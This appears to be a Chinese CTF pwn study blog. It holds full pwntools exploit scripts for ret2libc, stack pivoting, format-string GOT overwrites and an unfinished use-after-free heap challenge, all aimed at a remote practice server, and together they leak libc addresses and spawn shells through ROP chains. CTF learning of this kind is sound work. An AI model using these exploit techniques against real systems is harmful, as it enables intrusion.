#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#payload1=b'a'*(0x30+8)+p64(buf_addr)
#gdb.attach(p)
#pause()
p.sendlineafter('your name:\n',b'\x00')
p.sendlineafter('friend name:\n',b'\x00')

payload=b'a'*(0x20+4)+ p32(elf.plt['puts']) + p32(0x80485F1) + p32(elf.got['puts'])
p.sendline(payload)

puts_addr=u32(p.recvuntil("\xf7")[-4:])
print(hex(puts_addr))


libc_base = puts_addr - libc.sym["puts"]
print(hex(libc_base))

system_addr=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()

'''
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
print(hex(libc_base))
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")
'''

p.sendlineafter('your name:\n',b'\x00')
p.sendlineafter('friend name:\n',b'\x00')

payload1 =b'A'*(0x20+4)+p32(system_addr)+b'AAAA'+p32(bin_sh)
#gdb.attach(p)
#pause()
p.sendline(payload1)


p.interactive()

md,这个libcsearch没找到,得自己找

sleep-找不到libc版本

跟上面做法差不多

直接贴脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
from pwn import *
#from LibcSearcher import *
#p = process('./name4')
p = remote('1.95.36.136', 2084)
context(os='linux',arch='amd64',log_level='debug')
elf=ELF('./name4')
libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#payload1=b'a'*(0x30+8)+p64(buf_addr)
#gdb.attach(p)
#pause()
p.sendlineafter('your name:\n',b'\x00')
p.sendlineafter('friend name:\n',b'\x00')

payload=b'a'*(0x20+4)+ p32(elf.plt['puts']) + p32(0x80485F1) + p32(elf.got['puts'])
p.sendline(payload)

puts_addr=u32(p.recvuntil("\xf7")[-4:])
print(hex(puts_addr))


libc_base = puts_addr - libc.sym["puts"]
print(hex(libc_base))

system_addr=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()

'''
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
print(hex(libc_base))
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")
'''

p.sendlineafter('your name:\n',b'\x00')
p.sendlineafter('friend name:\n',b'\x00')

payload1 =b'A'*(0x20+4)+p32(system_addr)+b'AAAA'+p32(bin_sh)
#gdb.attach(p)
#pause()
p.sendline(payload1)


p.interactive()

远程环境的问题

stack_pivotingx86

栈迁移

日常检查一下

1
2
3
4
5
6
7
8
bbq@ubuntu:~$ checksec 1111
[*] '/home/bbq/1111'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
bbq@ubuntu:~$ 
1
2
3
4
5
6
7
8
9
10
11
12
ssize_t vuln()
{
  char buf[40]; // [esp+0h] [ebp-28h] BYREF

  write(1, "Welcome to CTF_STACK world\n", 0x1Bu);
  write(1, "Please input your name:\n", 0x18u);
  read(0, buf, 0x30u);
  write(1, "Hello ", 6u);
  puts(buf);
  write(1, "Would you like tell me some message:\n", 0x25u);
  return read(0, buf, 0x30u);
}

就是不到为什么会有两次read

题目system和/bin/sh地址都在

不用泄露基址哇

因为我们不知道栈顶的位置

so我们要通过第一个read策一下距离

x/5xw $esp

查看寄存器值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./1111')
p=remote('1.95.36.136', 2119)
#p = process('./1111')

leave_addr=0x8048666
#Rread=0x804860D

system_addr=0x8048420
bin_sh=0x804A030

rl('your name:\n')

payload1=b'a'*(0x28-1)+b'b'
#bug()
s(payload1)
rl('b')

esp=u32(p.recv(4))-0x38
pr(hex(esp))


rl('message:\n')
payload=b'aaaa'+p32(system_addr)+b'AAAA'+p32(bin_sh)
payload=payload.ljust(0x28,b'\x00')
payload+=p32(esp)+p32(leave_addr) 
#bug() 
s(payload)
 
 
 
inter()

踩坑点:注意esp距离ebp的长度

image-20241107165736456

相减得到0x38

夕阳下的舞者-未做出

日常检查

1
2
3
4
5
6
7
8
bbq@ubuntu:~$ checksec 1111
[*] '/home/bbq/1111'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
bbq@ubuntu:~$

感觉是上难度了

果然是堆题

这回是直接干

看一眼题wp说是有个换libc环境

1
2
patchelf --replace-needed libc.so.6 ./libc-2.23.so ./562+5Liq5Yiw
patchelf --set-interpreter ./ld-2.23.so ./562+5Liq5Yiw

但是我是直接跑起来了

1

heap_Easy_Uaf

2024.11.12

既然是堆题,并且连漏洞都告诉你了

就好好找一下吧

1
2
3
4
5
6
7
8
bbq@ubuntu:~$ checksec 1111
[*] '/home/bbq/1111'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
bbq@ubuntu:~$

其实说实话,如果说是堆题的话,这个保护机制还有利用的必要吗???

先找一下漏洞吧

既然是UAF漏洞

uaf漏洞通常就是内存块被释放后,其对应的指针没有被置为NUL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./1111')
p=remote('1.95.36.136', 2107)
#p = process('./1111')
 
 
rl('Please Choice!')
sl(str(5))
rl('size :')
sl(str(0x68)) 
rl('Content : ')
sl(b'Flag')

 
 
 
inter()

05ret2libc_64

2024.11.12

不用看了直接写吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from pwn import*
from struct import pack
import ctypes
from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
#context(os='linux',arch='i386',log_level='debug')   
context(os='linux',arch='amd64',log_level='debug')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./1111')
p=remote('1.95.36.136', 2084)
#p = process('./ret2libc')
 
 
pop_rdi=0x0000000000400753 
ret_addr=0x0000000000400509
payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main'])
sl(payload)

puts_addr=get_addr64()
pr(hex(puts_addr))

'''
libc_base=puts_addr-libc.sym['puts']
pr(hex(libc_base))
 system_addr,bin_sh=get_sb()
'''

libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
pr(hex(libc_base))
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")




payload2= flat([b'a'*(0x70+8),ret_addr,pop_rdi,bin_sh,system_addr])
sl(payload2)

inter()

做不出来的最大问题就是libc环境问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
 
context(arch='amd64', os='linux', log_level='debug')
io = remote('1.95.36.136', 2086)
elf = ELF('./1111')
#io=process('./1111') 
pop_rdi_ret = 0x400843
ret_addr = 0x400581
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']
 
payload = b'a' * 0x100 + b'b' * 8 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('question:\n', payload)
 
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print('puts_addr=', hex(puts_addr))
 
libc_base = puts_addr - 0x06f6a0
print(hex(libc_base))
system_addr = libc_base + 0x0453a0
bin_sh_addr = libc_base + 0x18ce57
 
payload = b'a' * 0x100 + b'b' * 8 + p64(ret_addr) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
io.sendlineafter('question:\n', payload)
io.interactive()

格式化字符串劫持got

日常检查一下

1
2
3
4
5
6
7
8
bq@ubuntu:~$ checksec pwn1
[*] '/home/bbq/pwn1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
bbq@ubuntu:~$

ida打开看一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
int come_on()
{
  char buf[64]; // [esp+Ch] [ebp-4Ch] BYREF
  unsigned int v2; // [esp+4Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  system("echo hhh~");
  read(0, buf, 0x50u);
  printf(buf);
  puts("echo you are good");
  puts("echo hh,the shell give you");
  printf("/bin/sh");
  return 0;
}

看着还是比较基础的

思路:第一个泄露地址,然后got改写

这种先找一下偏移

image-20241114114500318

知道偏移为7

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import*
from struct import pack
import ctypes
#from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
context(os='linux',arch='i386',log_level='debug')   
#context(os='linux',arch='amd64',log_level='debug')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('libc-2.23.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./pwn1')
p=remote('1.95.36.136', 2056)
#p = process('./pwn1')

#sla('hhh~',b'aa')


printf_got=elf.got['printf']
system_plt=elf.plt['system']

system_addr=0x8048490

#p.recv()

payload = fmtstr_payload(7,{printf_got:system_addr})

sla('hhh~',payload)

 
 
 
inter()

format_ropx86

2024.11.14

1
2
3
4
5
6
7
8
bbq@ubuntu:~$ checksec 1111
[*] '/home/bbq/1111'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
bbq@ubuntu:~$

ida打开就是一个格式化字符串加一个ROP链

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
from pwn import*
from struct import pack
import ctypes
from LibcSearcher import *
def bug():
	gdb.attach(p)
	pause()
def s(a):
	p.send(a)
def sa(a,b):
	p.sendafter(a,b)
def sl(a):
	p.sendline(a)
def sla(a,b):
	p.sendlineafter(a,b)
def r(a):
	p.recv(a)
#def pr(a):
	#print(p.recv(a))
def rl(a):
	return p.recvuntil(a)
def inter():
	p.interactive()
def get_addr64():
	return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
	return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
	return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
def get_hook():
	return libc_base+libc.sym['__malloc_hook'],libc_base+libc.sym['__free_hook']
pr = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
 
    
context(os='linux',arch='i386',log_level='debug')   
#context(os='linux',arch='amd64',log_level='debug')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')    
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
#libc=ELF('./libc6-x32_2.17-0ubuntu5_amd64.so') 
#libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')    
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./1111')
p=remote('1.95.36.136', 2124)
#p = process('./1111')

rl('name\n')
payload=p32(0x804A030)+b'aaaa'+b"%4$n"
#bug()
s(payload)

rl('secret:')
 
payload1 = b"A"*(0x108+4)+ p32(elf.plt['puts']) + p32(elf.sym['vuln']) + p32(elf.got['puts']) 
sl(payload1) 

puts_addr=get_addr32()
pr(hex(puts_addr))



'''
libc_base=puts_addr-libc.sym['puts']
pr(hex(libc_base))


system_addr,bin_sh= get_sb()
'''
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")



payload3 = flat([b'A'*(0x108+4),system_addr,b'aaaa',bin_sh])
p.sendline(payload3)


inter()	




#libc6-i386_2.23-0ubuntu11.3_amd64